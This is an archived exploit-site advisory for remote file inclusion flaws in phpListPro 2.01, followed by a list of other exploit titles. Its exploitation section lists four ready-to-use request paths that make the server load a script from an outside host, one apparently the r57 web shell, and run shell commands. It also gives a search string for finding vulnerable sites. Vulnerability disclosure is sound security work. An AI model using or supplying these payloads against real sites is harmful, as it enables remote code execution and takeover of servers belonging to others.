exploits , vulnerabilities , articles , phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities

2006-05-19 phpListPro <= 2.0.1 (User-Agent) Remote Code Execution Exploit

2006-05-08

phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities

Rated as : Moderate Risk

Title: phpListPro <= 2.01 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: SmartISoft
URL: http://smartisoft.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "PHPListPro ©2001-2006 SmartISoft"
-----------------------------------------------------------------

Exploitation:

/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls


securitydot.net - 2006-05-08

Exploits - newest 10 RSS | More

2007-06-15 57294 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34218 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42436 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29338 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19777 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16711 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19409 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16596 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33611 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17237 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit